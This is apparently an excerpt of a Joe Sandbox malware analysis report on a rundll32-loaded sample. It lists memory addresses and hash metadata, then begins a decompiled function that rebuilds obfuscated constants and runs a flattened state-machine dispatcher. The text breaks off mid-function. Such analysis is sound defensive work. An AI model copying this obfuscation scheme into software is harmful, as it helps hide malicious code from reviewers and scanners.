                                                                                                                      0x00000000
                                                                                                                      0x00362eb8
                                                                                                                      0x00362de8
                                                                                                                      0x00362e50
                                                                                                                      0x00362e57
                                                                                                                      0x00362e59
                                                                                                                      0x00000000
                                                                                                                      0x00362e59
                                                                                                                      0x00362df0
                                                                                                                      0x00362e34
                                                                                                                      0x00362e3d
                                                                                                                      0x00362e45
                                                                                                                      0x00000000
                                                                                                                      0x00362e45
                                                                                                                      0x00362df8
                                                                                                                      0x00363657
                                                                                                                      0x00000000
                                                                                                                      0x00363657
                                                                                                                      0x00362e04
                                                                                                                      0x00000000
                                                                                                                      0x00362e0a
                                                                                                                      0x00362e0a
                                                                                                                      0x00362e20
                                                                                                                      0x00000000
                                                                                                                      0x00362e26
                                                                                                                      0x00362e04
                                                                                                                      0x00363212
                                                                                                                      0x00363218
                                                                                                                      0x003634f8
                                                                                                                      0x003634fe
                                                                                                                      0x003635b6
                                                                                                                      0x003635bc
                                                                                                                      0x0036360e
                                                                                                                      0x00363634
                                                                                                                      0x0036363d
                                                                                                                      0x00000000
                                                                                                                      0x0036363d
                                                                                                                      0x003635be
                                                                                                                      0x003635c4
                                                                                                                      0x003635f4
                                                                                                                      0x003635f9
                                                                                                                      0x003635fb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003635fd
                                                                                                                      0x00000000
                                                                                                                      0x003635fd
                                                                                                                      0x003635c6
                                                                                                                      0x003635cc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003635ce
                                                                                                                      0x003635d5
                                                                                                                      0x003635da
                                                                                                                      0x00000000
                                                                                                                      0x003635da
                                                                                                                      0x00363504
                                                                                                                      0x0036359f
                                                                                                                      0x003635a4
                                                                                                                      0x003635a6
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003635ac
                                                                                                                      0x00000000
                                                                                                                      0x003635ac
                                                                                                                      0x0036350a
                                                                                                                      0x00363510
                                                                                                                      0x00363589
                                                                                                                      0x0036358e
                                                                                                                      0x00000000
                                                                                                                      0x0036358e
                                                                                                                      0x00363512
                                                                                                                      0x00363518
                                                                                                                      0x00363573
                                                                                                                      0x00363578
                                                                                                                      0x00000000
                                                                                                                      0x00363578
                                                                                                                      0x0036351a
                                                                                                                      0x00363520

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: kJ$*k$/;$7Mv?$@`ST$Mg$N&>$Nv$RiW$XgI8/$Y$[@M$[TA$``$fyI$l$!CG$I8/$M<$d$t}$z
                                                                                                                      • API String ID: 0-363835068
                                                                                                                      • Opcode ID: d34bb7920d174213af1280e9c052c8a452b22bc54cc27e895c4224b6d00294bb
                                                                                                                      • Instruction ID: 4ffd84a56d5b40d7044ca73b329052d32887273116c4a8a68ec7843ae9794914
                                                                                                                      • Opcode Fuzzy Hash: d34bb7920d174213af1280e9c052c8a452b22bc54cc27e895c4224b6d00294bb
                                                                                                                      • Instruction Fuzzy Hash: A9C222719093818BD3B9CF25C58ABCBBBE1BBC5314F11891DE5D99A260DBB09948CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00357BCA(signed int __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _t784;
                                                                                                                      				signed int _t787;
                                                                                                                      				signed int _t791;
                                                                                                                      				void* _t797;
                                                                                                                      				signed int _t807;
                                                                                                                      				signed int _t808;
                                                                                                                      				void* _t827;
                                                                                                                      				signed int* _t829;
                                                                                                                      				signed int _t833;
                                                                                                                      				intOrPtr _t841;
                                                                                                                      				void* _t884;
                                                                                                                      				signed int _t899;
                                                                                                                      				signed int _t900;
                                                                                                                      				signed int _t901;
                                                                                                                      				signed int _t902;
                                                                                                                      				signed int _t903;
                                                                                                                      				signed int _t904;
                                                                                                                      				signed int _t905;
                                                                                                                      				signed int _t906;
                                                                                                                      				signed int _t907;
                                                                                                                      				signed int _t908;
                                                                                                                      				signed int _t909;
                                                                                                                      				signed int _t910;
                                                                                                                      				signed int _t911;
                                                                                                                      				signed int _t912;
                                                                                                                      				signed int _t914;
                                                                                                                      				signed int _t919;
                                                                                                                      				signed int* _t923;
                                                                                                                      				void* _t925;
                                                                                                                      
                                                                                                                      				_push(_a40);
                                                                                                                      				_push(_a36);
                                                                                                                      				_push(_a32);
                                                                                                                      				_t829 = _a24;
                                                                                                                      				_push(_a28);
                                                                                                                      				_v16 = __edx;
                                                                                                                      				_push(_t829);
                                                                                                                      				_push(_a20);
                                                                                                                      				_v12 = __ecx;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4 & 0x0000ffff);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_a4 & 0x0000ffff);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v8 = 0x5b6770;
                                                                                                                      				_t923 =  &(( &_v296)[0xc]);
                                                                                                                      				_v296 = 0xae8f26;
                                                                                                                      				_v24 = 0;
                                                                                                                      				_t827 = 0;
                                                                                                                      				_t914 = 0x83eeb0d;
                                                                                                                      				_t899 = 0x66;
                                                                                                                      				_v296 = _v296 * 0x77;
                                                                                                                      				_v296 = _v296 + 0xffff6317;
                                                                                                                      				_v296 = _v296 | 0x51a667a9;
                                                                                                                      				_v296 = _v296 ^ 0x51a7efe9;
                                                                                                                      				_v220 = 0x22f2e2;
                                                                                                                      				_v220 = _v220 + 0xffff44aa;
                                                                                                                      				_v220 = _v220 / _t899;
                                                                                                                      				_t900 = 0x6e;
                                                                                                                      				_v220 = _v220 / _t900;
                                                                                                                      				_v220 = _v220 ^ 0x000000d4;
                                                                                                                      				_v180 = 0x3b651;
                                                                                                                      				_v180 = _v180 << 0xd;
                                                                                                                      				_v180 = _v180 >> 7;
                                                                                                                      				_v180 = _v180 ^ 0x00ed9488;
                                                                                                                      				_v100 = 0xe67bf2;
                                                                                                                      				_v100 = _v100 + 0x555e;
                                                                                                                      				_v100 = _v100 ^ 0x00e65150;
                                                                                                                      				_v120 = 0x8bcc28;
                                                                                                                      				_v120 = _v120 + 0xffffc7f8;
                                                                                                                      				_v120 = _v120 ^ 0x008bd420;
                                                                                                                      				_v216 = 0x57910f;
                                                                                                                      				_v216 = _v216 ^ 0xab75fa15;
                                                                                                                      				_v216 = _v216 ^ 0x4a558bb8;
                                                                                                                      				_v216 = _v216 << 0x10;
                                                                                                                      				_v216 = _v216 ^ 0xe0e20000;
                                                                                                                      				_v108 = 0xde84ad;
                                                                                                                      				_v108 = _v108 + 0xffffece5;
                                                                                                                      				_v108 = _v108 ^ 0x00da7192;
                                                                                                                      				_v124 = 0x7a6f99;
                                                                                                                      				_v124 = _v124 + 0x7c9;
                                                                                                                      				_v124 = _v124 << 0x10;
                                                                                                                      				_v124 = _v124 ^ 0x73620000;
                                                                                                                      				_v212 = 0x24738c;
                                                                                                                      				_v212 = _v212 + 0xffff84c3;
                                                                                                                      				_v212 = _v212 ^ 0xe5eb5ff0;
                                                                                                                      				_v212 = _v212 * 0x5c;
                                                                                                                      				_v212 = _v212 ^ 0x941448a4;
                                                                                                                      				_v60 = 0x198952;
                                                                                                                      				_v60 = _v60 + 0x4ddc;
                                                                                                                      				_v60 = _v60 ^ 0x0019d52e;
                                                                                                                      				_v48 = 0xba80a;
                                                                                                                      				_v48 = _v48 + 0x1f7d;
                                                                                                                      				_v48 = _v48 ^ 0x000bc687;
                                                                                                                      				_v40 = 0x36c14f;
                                                                                                                      				_v40 = _v40 << 0xc;
                                                                                                                      				_v40 = _v40 ^ 0xec14f000;
                                                                                                                      				_v72 = 0x4ddbf0;
                                                                                                                      				_v72 = _v72 + 0xffff1656;
                                                                                                                      				_v72 = _v72 ^ 0x004cf246;
                                                                                                                      				_v44 = 0x551f62;
                                                                                                                      				_v44 = _v44 ^ 0x64841b78;
                                                                                                                      				_v44 = _v44 ^ 0x64d1045b;
                                                                                                                      				_v152 = 0xb013f0;
                                                                                                                      				_t901 = 0x18;
                                                                                                                      				_v152 = _v152 * 0x52;
                                                                                                                      				_v152 = _v152 ^ 0xa7d20536;
                                                                                                                      				_v152 = _v152 ^ 0x9fb467c9;
                                                                                                                      				_v168 = 0xdb80e;
                                                                                                                      				_v168 = _v168 << 0xc;
                                                                                                                      				_v168 = _v168 + 0x66d3;
                                                                                                                      				_v168 = _v168 ^ 0xdb8146cc;
                                                                                                                      				_v116 = 0x5fff40;
                                                                                                                      				_v116 = _v116 + 0xac16;
                                                                                                                      				_v116 = _v116 ^ 0x0060ab55;
                                                                                                                      				_v28 = 0x8c1e54;
                                                                                                                      				_v28 = _v28 ^ 0x40badf76;
                                                                                                                      				_v28 = _v28 ^ 0x4036c022;
                                                                                                                      				_v296 = 0x412245;
                                                                                                                      				_v296 = _v296 / _t901;
                                                                                                                      				_v296 = _v296 + 0x2cd;
                                                                                                                      				_v296 = _v296 >> 0xf;
                                                                                                                      				_v296 = _v296 ^ 0x00000af3;
                                                                                                                      				_v296 = 0xa8f395;
                                                                                                                      				_t902 = 0x4e;
                                                                                                                      				_v296 = _v296 / _t902;
                                                                                                                      				_v296 = _v296 + 0x6ac4;
                                                                                                                      				_v296 = _v296 << 6;
                                                                                                                      				_v296 = _v296 ^ 0x00ac1221;
                                                                                                                      				_v296 = 0xd124a6;
                                                                                                                      				_t903 = 7;
                                                                                                                      				_v296 = _v296 / _t903;
                                                                                                                      				_v296 = _v296 ^ 0x9d1dae1f;
                                                                                                                      				_v296 = _v296 | 0xe011ad48;
                                                                                                                      				_v296 = _v296 ^ 0xfd13ad6e;
                                                                                                                      				_v296 = 0xfabeb9;
                                                                                                                      				_v296 = _v296 >> 3;
                                                                                                                      				_v296 = _v296 + 0xfffff1c8;
                                                                                                                      				_t904 = 0x7d;
                                                                                                                      				_v296 = _v296 / _t904;
                                                                                                                      				_v296 = _v296 ^ 0x000314ef;
                                                                                                                      				_v296 = 0x1fa60b;
                                                                                                                      				_v296 = _v296 * 0x75;
                                                                                                                      				_v296 = _v296 >> 0xd;
                                                                                                                      				_v296 = _v296 + 0x5a08;
                                                                                                                      				_v296 = _v296 ^ 0x000a0276;
                                                                                                                      				_v292 = 0xde324a;
                                                                                                                      				_v292 = _v292 ^ 0x385f234d;
                                                                                                                      				_v292 = _v292 ^ 0x83f834b0;
                                                                                                                      				_v292 = _v292 ^ 0xbb7de3fa;
                                                                                                                      				_v288 = 0x3fe2ee;
                                                                                                                      				_t208 =  &_v288; // 0x3fe2ee
                                                                                                                      				_t905 = 0x7a;
                                                                                                                      				_v288 =  *_t208 / _t905;
                                                                                                                      				_v288 = _v288 ^ 0x0006d348;
                                                                                                                      				_v288 = 0x668cef;
                                                                                                                      				_v288 = _v288 << 1;
                                                                                                                      				_v288 = _v288 ^ 0x00ccb692;
                                                                                                                      				_v296 = 0x30a71d;
                                                                                                                      				_t906 = 0x6a;
                                                                                                                      				_v296 = _v296 * 0x35;
                                                                                                                      				_v296 = _v296 + 0xfc26;
                                                                                                                      				_v296 = _v296 + 0xffffafb1;
                                                                                                                      				_v296 = _v296 ^ 0x0a154a10;
                                                                                                                      				_v292 = 0x29409b;
                                                                                                                      				_v292 = _v292 << 4;
                                                                                                                      				_v292 = _v292 + 0x774;
                                                                                                                      				_v292 = _v292 ^ 0x029bb852;
                                                                                                                      				_v292 = 0xc87f9a;
                                                                                                                      				_v292 = _v292 >> 8;
                                                                                                                      				_v292 = _v292 >> 0xe;
                                                                                                                      				_v292 = _v292 ^ 0x00086377;
                                                                                                                      				_v292 = 0x96b752;
                                                                                                                      				_v292 = _v292 + 0x721a;
                                                                                                                      				_v292 = _v292 * 0x33;
                                                                                                                      				_v292 = _v292 ^ 0x1e11edab;
                                                                                                                      				_v292 = 0x9caff;
                                                                                                                      				_v292 = _v292 | 0x3ce1fe14;
                                                                                                                      				_v292 = _v292 ^ 0x920c3820;
                                                                                                                      				_v292 = _v292 ^ 0xaeed4fa4;
                                                                                                                      				_v268 = 0x625e2a;
                                                                                                                      				_v268 = _v268 + 0xa90c;
                                                                                                                      				_v268 = _v268 << 5;
                                                                                                                      				_v268 = _v268 + 0xdce3;
                                                                                                                      				_v268 = _v268 ^ 0x0c65276a;
                                                                                                                      				_v276 = 0x811ec0;
                                                                                                                      				_v276 = _v276 << 6;
                                                                                                                      				_v276 = _v276 * 0x18;
                                                                                                                      				_v276 = _v276 | 0xc27c5ff7;
                                                                                                                      				_v276 = _v276 ^ 0xc6f6c0fc;
                                                                                                                      				_v80 = 0xbf5549;
                                                                                                                      				_v80 = _v80 + 0xd976;
                                                                                                                      				_v80 = _v80 ^ 0x00c51c7a;
                                                                                                                      				_v88 = 0xc74c4b;
                                                                                                                      				_v88 = _v88 << 0xf;
                                                                                                                      				_v88 = _v88 ^ 0xa6283482;
                                                                                                                      				_v164 = 0x7a7277;
                                                                                                                      				_t287 =  &_v164; // 0x7a7277
                                                                                                                      				_v164 =  *_t287 * 0x2a;
                                                                                                                      				_t289 =  &_v164; // 0x7a7277
                                                                                                                      				_v164 =  *_t289 * 0x14;
                                                                                                                      				_v164 = _v164 ^ 0x91c2b6e3;
                                                                                                                      				_v172 = 0x8c5cd0;
                                                                                                                      				_v172 = _v172 / _t906;
                                                                                                                      				_v172 = _v172 + 0xffffaf11;
                                                                                                                      				_v172 = _v172 ^ 0x0000520f;
                                                                                                                      				_v208 = 0x96f19c;
                                                                                                                      				_v208 = _v208 >> 0xf;
                                                                                                                      				_v208 = _v208 ^ 0xf87e01d8;
                                                                                                                      				_v208 = _v208 ^ 0xf879a426;
                                                                                                                      				_v64 = 0x5acacd;
                                                                                                                      				_v64 = _v64 << 5;
                                                                                                                      				_v64 = _v64 ^ 0x0b5bfe72;
                                                                                                                      				_v248 = 0xed9818;
                                                                                                                      				_v248 = _v248 + 0xffff852e;
                                                                                                                      				_v248 = _v248 + 0x2b61;
                                                                                                                      				_v248 = _v248 + 0xffff5032;
                                                                                                                      				_v248 = _v248 ^ 0x00eca9ae;
                                                                                                                      				_v196 = 0xd8fc83;
                                                                                                                      				_v196 = _v196 + 0xffffe6c0;
                                                                                                                      				_v196 = _v196 << 7;
                                                                                                                      				_v196 = _v196 ^ 0x6c795a10;
                                                                                                                      				_v104 = 0xa57136;
                                                                                                                      				_v104 = _v104 << 8;
                                                                                                                      				_v104 = _v104 ^ 0xa57ba4e8;
                                                                                                                      				_v112 = 0x619c13;
                                                                                                                      				_t907 = 0x35;
                                                                                                                      				_v112 = _v112 * 0x46;
                                                                                                                      				_v112 = _v112 ^ 0x1ab16c90;
                                                                                                                      				_v284 = 0x3b2abb;
                                                                                                                      				_v284 = _v284 * 0x43;
                                                                                                                      				_v284 = _v284 << 0x10;
                                                                                                                      				_v284 = _v284 << 3;
                                                                                                                      				_v284 = _v284 ^ 0x77883a24;
                                                                                                                      				_v204 = 0xef756c;
                                                                                                                      				_v204 = _v204 | 0xa0746111;
                                                                                                                      				_v204 = _v204 ^ 0x0b05d0bc;
                                                                                                                      				_v204 = _v204 ^ 0xabfd0224;
                                                                                                                      				_v144 = 0x44b7c0;
                                                                                                                      				_v144 = _v144 << 6;
                                                                                                                      				_v144 = _v144 + 0x629;
                                                                                                                      				_v144 = _v144 ^ 0x1122cbf1;
                                                                                                                      				_v228 = 0x31841a;
                                                                                                                      				_v228 = _v228 * 0x38;
                                                                                                                      				_v228 = _v228 ^ 0x4159fb72;
                                                                                                                      				_v228 = _v228 + 0x624a;
                                                                                                                      				_v228 = _v228 ^ 0x4b8ee7c8;
                                                                                                                      				_v232 = 0xc15230;
                                                                                                                      				_v232 = _v232 ^ 0x2fe872e1;
                                                                                                                      				_v232 = _v232 >> 0xe;
                                                                                                                      				_v232 = _v232 + 0xc85e;
                                                                                                                      				_v232 = _v232 ^ 0x00073260;
                                                                                                                      				_v200 = 0xd055c7;
                                                                                                                      				_v200 = _v200 << 0xe;
                                                                                                                      				_v200 = _v200 + 0x1578;
                                                                                                                      				_v200 = _v200 ^ 0x157facd3;
                                                                                                                      				_v132 = 0xe0a83f;
                                                                                                                      				_v132 = _v132 * 0x7b;
                                                                                                                      				_v132 = _v132 >> 0xd;
                                                                                                                      				_v132 = _v132 ^ 0x000704ed;
                                                                                                                      				_v240 = 0x8432d;
                                                                                                                      				_v240 = _v240 | 0xed632ad0;
                                                                                                                      				_v240 = _v240 ^ 0x6858c4b6;
                                                                                                                      				_v240 = _v240 + 0xfdcb;
                                                                                                                      				_v240 = _v240 ^ 0x85392506;
                                                                                                                      				_v192 = 0x8324f8;
                                                                                                                      				_v192 = _v192 * 0x5b;
                                                                                                                      				_v192 = _v192 * 0x35;
                                                                                                                      				_v192 = _v192 ^ 0xa6bebbcd;
                                                                                                                      				_v272 = 0x14de64;
                                                                                                                      				_v272 = _v272 | 0x750df782;
                                                                                                                      				_v272 = _v272 ^ 0x336a958a;
                                                                                                                      				_v272 = _v272 + 0xffff8f03;
                                                                                                                      				_v272 = _v272 ^ 0x467f1cdb;
                                                                                                                      				_v52 = 0x5532de;
                                                                                                                      				_v52 = _v52 >> 6;
                                                                                                                      				_v52 = _v52 ^ 0x00006622;
                                                                                                                      				_v160 = 0xce031d;
                                                                                                                      				_v160 = _v160 | 0xfbc8b092;
                                                                                                                      				_v160 = _v160 * 0x6d;
                                                                                                                      				_v160 = _v160 ^ 0x3708e9e0;
                                                                                                                      				_v36 = 0x5242dc;
                                                                                                                      				_v36 = _v36 >> 7;
                                                                                                                      				_v36 = _v36 ^ 0x000cba3f;
                                                                                                                      				_v92 = 0x339fd7;
                                                                                                                      				_v92 = _v92 + 0xa0d7;
                                                                                                                      				_v92 = _v92 ^ 0x00306e5b;
                                                                                                                      				_v128 = 0xd7d7e5;
                                                                                                                      				_v128 = _v128 * 0x70;
                                                                                                                      				_v128 = _v128 << 0xe;
                                                                                                                      				_v128 = _v128 ^ 0x9d0cda42;
                                                                                                                      				_v264 = 0x31382b;
                                                                                                                      				_v264 = _v264 / _t907;
                                                                                                                      				_t908 = 0x45;
                                                                                                                      				_v264 = _v264 * 0x6c;
                                                                                                                      				_v264 = _v264 * 0x28;
                                                                                                                      				_v264 = _v264 ^ 0x0fadceb8;
                                                                                                                      				_v184 = 0x6ad0e5;
                                                                                                                      				_v184 = _v184 / _t908;
                                                                                                                      				_t909 = 0x32;
                                                                                                                      				_v184 = _v184 * 0x5e;
                                                                                                                      				_v184 = _v184 ^ 0x009cabd8;
                                                                                                                      				_v84 = 0x5866f1;
                                                                                                                      				_v84 = _v84 / _t909;
                                                                                                                      				_v84 = _v84 ^ 0x000cf4a6;
                                                                                                                      				_v256 = 0xa194b;
                                                                                                                      				_v256 = _v256 ^ 0x94dec7ad;
                                                                                                                      				_t910 = 0x46;
                                                                                                                      				_v256 = _v256 / _t910;
                                                                                                                      				_v256 = _v256 >> 0x10;
                                                                                                                      				_v256 = _v256 ^ 0x000f9e72;
                                                                                                                      				_v76 = 0x8e9e60;
                                                                                                                      				_v76 = _v76 + 0xffff51c3;
                                                                                                                      				_v76 = _v76 ^ 0x0088247f;
                                                                                                                      				_v224 = 0x83ac61;
                                                                                                                      				_t911 = 0x3d;
                                                                                                                      				_v224 = _v224 * 0x1d;
                                                                                                                      				_v224 = _v224 << 0xc;
                                                                                                                      				_v224 = _v224 | 0x2dac99f4;
                                                                                                                      				_v224 = _v224 ^ 0xade893a0;
                                                                                                                      				_v32 = 0x13495a;
                                                                                                                      				_v32 = _v32 + 0x5cab;
                                                                                                                      				_v32 = _v32 ^ 0x001eeb0b;
                                                                                                                      				_v136 = 0x5c94f5;
                                                                                                                      				_v136 = _v136 + 0xffff9353;
                                                                                                                      				_v136 = _v136 * 0x44;
                                                                                                                      				_v136 = _v136 ^ 0x187702f3;
                                                                                                                      				_v176 = 0x8546fa;
                                                                                                                      				_v176 = _v176 ^ 0x1d3e4f45;
                                                                                                                      				_v176 = _v176 << 4;
                                                                                                                      				_v176 = _v176 ^ 0xdbb17ead;
                                                                                                                      				_v56 = 0x621504;
                                                                                                                      				_v56 = _v56 + 0x6ed1;
                                                                                                                      				_v56 = _v56 ^ 0x006a4e76;
                                                                                                                      				_v244 = 0x9c5408;
                                                                                                                      				_v244 = _v244 | 0xf9568eed;
                                                                                                                      				_v244 = _v244 + 0x5010;
                                                                                                                      				_v244 = _v244 / _t911;
                                                                                                                      				_v244 = _v244 ^ 0x041668c2;
                                                                                                                      				_v252 = 0xb42276;
                                                                                                                      				_v252 = _v252 + 0xa961;
                                                                                                                      				_v252 = _v252 + 0xdc70;
                                                                                                                      				_v252 = _v252 ^ 0x05685821;
                                                                                                                      				_v252 = _v252 ^ 0x05d7e4aa;
                                                                                                                      				_v260 = 0xd51767;
                                                                                                                      				_v260 = _v260 * 0x31;
                                                                                                                      				_v260 = _v260 << 0xc;
                                                                                                                      				_v260 = _v260 << 0xf;
                                                                                                                      				_v260 = _v260 ^ 0xb80dad1b;
                                                                                                                      				_v280 = 0xeb0bae;
                                                                                                                      				_v280 = _v280 | 0x0e7dba98;
                                                                                                                      				_v280 = _v280 << 6;
                                                                                                                      				_t912 = 0x26;
                                                                                                                      				_v280 = _v280 / _t912;
                                                                                                                      				_v280 = _v280 ^ 0x050e5033;
                                                                                                                      				_v188 = 0x4bf18;
                                                                                                                      				_v188 = _v188 * 0x2e;
                                                                                                                      				_v188 = _v188 | 0xf176dffe;
                                                                                                                      				_v188 = _v188 ^ 0xf1f57857;
                                                                                                                      				_v96 = 0x6c4fa9;
                                                                                                                      				_v96 = _v96 + 0x1fcf;
                                                                                                                      				_v96 = _v96 ^ 0x00693444;
                                                                                                                      				_v148 = 0xfd06aa;
                                                                                                                      				_v148 = _v148 >> 1;
                                                                                                                      				_v148 = _v148 << 0xc;
                                                                                                                      				_v148 = _v148 ^ 0xe83e1d17;
                                                                                                                      				_v156 = 0xd0b75a;
                                                                                                                      				_v156 = _v156 + 0xffff0c56;
                                                                                                                      				_v156 = _v156 * 0x3c;
                                                                                                                      				_v156 = _v156 ^ 0x30b9846f;
                                                                                                                      				_v288 = 0xd0c6e5;
                                                                                                                      				_v288 = _v288 >> 0xc;
                                                                                                                      				_v288 = _v288 ^ 0x0000ba9d;
                                                                                                                      				_v292 = 0x631535;
                                                                                                                      				_v292 = _v292 >> 8;
                                                                                                                      				_v292 = _v292 * 0x1e;
                                                                                                                      				_v292 = _v292 ^ 0x000d3f85;
                                                                                                                      				_v296 = 0x662a0d;
                                                                                                                      				_v296 = _v296 + 0x95ba;
                                                                                                                      				_v296 = _v296 >> 7;
                                                                                                                      				_v296 = _v296 ^ 0xe8c154cb;
                                                                                                                      				_v296 = _v296 ^ 0xe8c95b3b;
                                                                                                                      				_v140 = 0x555820;
                                                                                                                      				_v140 = _v140 << 4;
                                                                                                                      				_v140 = _v140 | 0xc7d2a78c;
                                                                                                                      				_v140 = _v140 ^ 0xc7df0fda;
                                                                                                                      				_t913 = _v20;
                                                                                                                      				_t921 = _v20;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						_t784 = _v236;
                                                                                                                      						while(1) {
                                                                                                                      							L3:
                                                                                                                      							_t925 = _t914 - 0x83eeb0d;
                                                                                                                      							if(_t925 <= 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0x969dc48;
                                                                                                                      							if(_t914 == 0x969dc48) {
                                                                                                                      								E00360411(_t784, _v148, _v156, _v288);
                                                                                                                      								_t914 = 0x7ec14ff;
                                                                                                                      								L40:
                                                                                                                      								_t829 = _a24;
                                                                                                                      								_t884 = 0x3d0a345;
                                                                                                                      								L41:
                                                                                                                      								__eflags = _t914 - 0xa326727;
                                                                                                                      								if(__eflags == 0) {
                                                                                                                      									L11:
                                                                                                                      									return _t827;
                                                                                                                      								}
                                                                                                                      								_t784 = _v236;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0x9d261fa;
                                                                                                                      							if(_t914 == 0x9d261fa) {
                                                                                                                      								_t833 =  *_t829;
                                                                                                                      								__eflags = _t833;
                                                                                                                      								if(_t833 == 0) {
                                                                                                                      									_t787 = 0;
                                                                                                                      									__eflags = 0;
                                                                                                                      								} else {
                                                                                                                      									_t787 = _a24[1];
                                                                                                                      								}
                                                                                                                      								E0035BD01(_v56, _t913, _t833, _v244, _v252, _t787, _v260, _a20);
                                                                                                                      								_t923 =  &(_t923[7]);
                                                                                                                      								asm("sbb esi, esi");
                                                                                                                      								_t914 = (_t914 & 0xf886a69e) + 0xe7d57af;
                                                                                                                      								L13:
                                                                                                                      								_t829 = _a24;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0xd1f742e;
                                                                                                                      							if(_t914 == 0xd1f742e) {
                                                                                                                      								_push(_t829);
                                                                                                                      								_t791 = E003590DB(_v72, _t829, _v268, _t829, _v276, _v80, _v88);
                                                                                                                      								_t921 = _t791;
                                                                                                                      								__eflags = _t791;
                                                                                                                      								_t914 =  !=  ? 0x266034b : 0xa326727;
                                                                                                                      								E003468DE(_v164, _v172, _v208, _v64, 0);
                                                                                                                      								_t923 =  &(_t923[0xa]);
                                                                                                                      								goto L40;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0xe7d57af;
                                                                                                                      							if(_t914 == 0xe7d57af) {
                                                                                                                      								_t703 =  &_v96; // 0x693444
                                                                                                                      								E00360411(_t913, _v280, _v188,  *_t703);
                                                                                                                      								L33:
                                                                                                                      								_t914 = 0x969dc48;
                                                                                                                      								goto L13;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0xef78d61;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								goto L41;
                                                                                                                      							}
                                                                                                                      							_t914 = 0xd1f742e;
                                                                                                                      						}
                                                                                                                      						if(_t925 == 0) {
                                                                                                                      							_t914 = 0xef78d61;
                                                                                                                      							goto L3;
                                                                                                                      						}
                                                                                                                      						if(_t914 == 0xb94cb2) {
                                                                                                                      							__eflags = E00360867(_t913, _a28);
                                                                                                                      							_t914 = 0xe7d57af;
                                                                                                                      							_t797 = 1;
                                                                                                                      							_t827 =  !=  ? _t797 : _t827;
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						if(_t914 == 0x266034b) {
                                                                                                                      							_t695 =  &_v112; // 0x306e5b
